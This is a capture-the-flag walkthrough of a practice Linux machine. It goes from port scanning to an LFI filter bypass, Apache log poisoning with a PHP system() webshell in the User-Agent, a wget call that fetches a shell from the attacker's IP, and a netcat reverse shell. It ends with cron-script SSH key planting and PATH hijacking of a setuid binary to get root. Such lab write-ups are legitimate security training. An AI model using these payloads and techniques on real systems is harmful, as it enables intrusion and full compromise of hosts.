CTF Writeups
Boot2root machine using LFI and privilege escalation on Linux
Get a shell
Find a different hostname
Here will start with gathering some info from the sever using nmap:
$ nmap -A -p- $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 13:44 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.54.115
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_ 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds
We can see there are 2 ports open, 22 for ssh and 80 for HTTP. Ssh is generally secure by default so we will check out the webserver.
When we connect to the web page, we can see reference to an email with a custom domain. This must be our answer:
ans : mafialive.thm
Find flag 1
I went with a gobuster scan on the IP address itself but did not return anything all that useful. Since we have a host name, we should add this to the ‘/etc/hosts’ file mapped to the IP address of the server and scan again:
─$ curl http://mafialive.thm
<h1>UNDER DEVELOPMENT</h1>**************************
find the page under development
This brings us to a different page so now we should run gobuster again:
─$ gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://mafialive.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/18 14:17:29 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/robots.txt (Status: 200) [Size: 34]
/server-status (Status: 403) [Size: 278]
===============================================================
2021/09/18 14:18:01 Finished
===============================If we check the robots.txt file, we will see that there is a disallowed entry called test.php
─$ curl http://mafialive.thm/robots.txt
User-agent: *
Disallow: /test.phpans: test.php
At /test.php we are able to do lfi if we can use php://filter and base64:
─$ curl -s http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
<!DOCTYPE HTML>
<html><head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg== </div>
</body></html>
We can now decode this using base64 tool or an online tool:
─$ base64 -d b64.txt > decoded.txt
┌──(kali㉿kali)-[~/CTF/THM/archangel]
└─$ cat decoded.txt
<!DOCTYPE HTML>
<html><head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php //FLAG: **************** function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
include $_GET['view'];
}else{ echo 'Sorry, Thats not allowed';
}
}
?>
</div>
</body></html>
- answer can be found in the output of
curl
Get a shell and find the user flag
- Here we can see above in the php code that if the request contains
../..it will not allow us. However, we can use other techniques here. Simply by adding and extra slash..//..Should allow us to access files on the system such as the/etc/passwdfile or the apache access log:
─$ curl -s http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log- Since we have access to the above file, we can try a technique to get RCE known as log poisoning, which should allow us to put a webshell on the machine and execute it through the website. For this it is easier to use something like burp repeater to edit the above request.
- open a python server
python3 http.server 8000 - use burp repeater to
wgetthe php shell in url path & php webshell to user agent (which is parsed in the apache log):
GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%20http://10.11.34.30:8000/123414.php HTTP/1.1
Host: mafialive.thm
User-Agent: <?php system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0We should now be able to open a netcat listener and visit http://mafialive.thm/nameofyourshell.php to get a shell:
nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.11.34.30] from (UNKNOWN) [10.10.115.78] 60838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
21:19:47 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
archangel
www-data@ubuntu:/home$ cd archangel
cd archangel
www-data@ubuntu:/home/archangel$ ls
ls
myfiles secret user.txt
www-data@ubuntu:/home/archangel$ cat user.txt
cat user.txt
***{***************}Ans: ***{***************}
Get User 2 flag
- There is a cronjob running (
/opt/helloworld.sh) that is world writable and we can use to escalate to the “archangel” user:
www-data@ubuntu:/opt$ ls -la
ls -la
total 16
drwxrwxrwx 3 root root 4096 Nov 20 10:35 .
drwxr-xr-x 22 root root 4096 Nov 16 15:39 ..
drwxrwx--- 2 archangel archangel 4096 Nov 20 15:04 backupfiles
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh
www-data@ubuntu:/opt$ cat helloworld.sh
cat helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfilesWe can add a generated ssh key on our attacker box to the authorised keys in /home/archangel and ssh into the box as that user:
#!/bin/bash
mkdir -p /home/archangel/.ssh
echo "your ssh key here" >/home/archangel/.ssh/authorized_keysWe can now ssh in as the user and grab the flag:
kali@kali:/data/Archangel/files$ ssh archangel@mafialive.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.231.1' to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-123-generic x86_64) * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Fri Nov 20 15:21:35 2020
archangel@ubuntu:~$ ls
total 48
drwxr-xr-x 7 archangel archangel 4096 Apr 26 14:13 ./
drwxr-xr-x 3 root root 4096 Nov 18 13:06 ../
-rw-r--r-- 1 archangel archangel 220 Nov 18 00:48 .bash_logout
-rw-r--r-- 1 archangel archangel 3771 Nov 18 00:48 .bashrc
drwx------ 2 archangel archangel 4096 Nov 18 13:08 .cache/
drwxrwxr-x 3 archangel archangel 4096 Nov 18 11:20 .local/
drwxr-xr-x 2 archangel archangel 4096 Nov 18 01:36 myfiles/
-rw-r--r-- 1 archangel archangel 807 Nov 18 00:48 .profile
drwxrwx--- 2 archangel archangel 4096 Nov 19 20:41 secret/
-rw-rw-r-- 1 archangel archangel 66 Nov 18 11:20 .selected_editor
drwxrwxr-x 2 archangel archangel 4096 Apr 26 14:13 .ssh/
-rw-r--r-- 1 archangel archangel 26 Nov 19 19:57 user.txt
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ls
total 32
drwxrwx--- 2 archangel archangel 4096 Nov 19 20:41 ./
drwxr-xr-x 7 archangel archangel 4096 Apr 26 14:13 ../
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup*
-rw-r--r-- 1 root root 49 Nov 19 20:41 user2.txt
archangel@ubuntu:~/secret$ cat user2.txt
Get the root flag
If we have a look around the users home directory we can see there is an ELF binary running with a setuid bit set. We could possibly abuse this. By can use strings to what it is doing. It seems to be using the cp command to copy files to another directory:
cp /home/user/archangel/myfiles/* /opt/backupfilesAs the script is not using the absolute path of cp, we can create our own cp command that spawns a shell as root in the secret directory and add it to the Path.
archangel@ubuntu:~/secret$ cat > cp << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
archangel@ubuntu:~/secret$ chmod +x cp
archangel@ubuntu:~/secret$ export PATH=/home/archangel/secret:$PATHWhen we execute the script, it will use our own cp command, which will spawn a root shell:
archangel@ubuntu:~/secret$ ./backup
root@ubuntu:~/secret# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# cd /root/
root@ubuntu:/root# ll
total 28
drwx------ 4 root root 4096 Nov 20 15:22 ./
drwxr-xr-x 22 root root 4096 Nov 16 15:39 ../
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Nov 18 13:06 .cache/
drwxr-xr-x 3 root root 4096 Nov 16 19:27 .local/
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 68 Nov 19 19:59 root.txt
root@ubuntu:/root# cat root.txtThe privilege escalation in this room may be tough for beginners, but you will learn a lot about chaining different vectors together to escalate to root. Would highly recommend checking this one out!
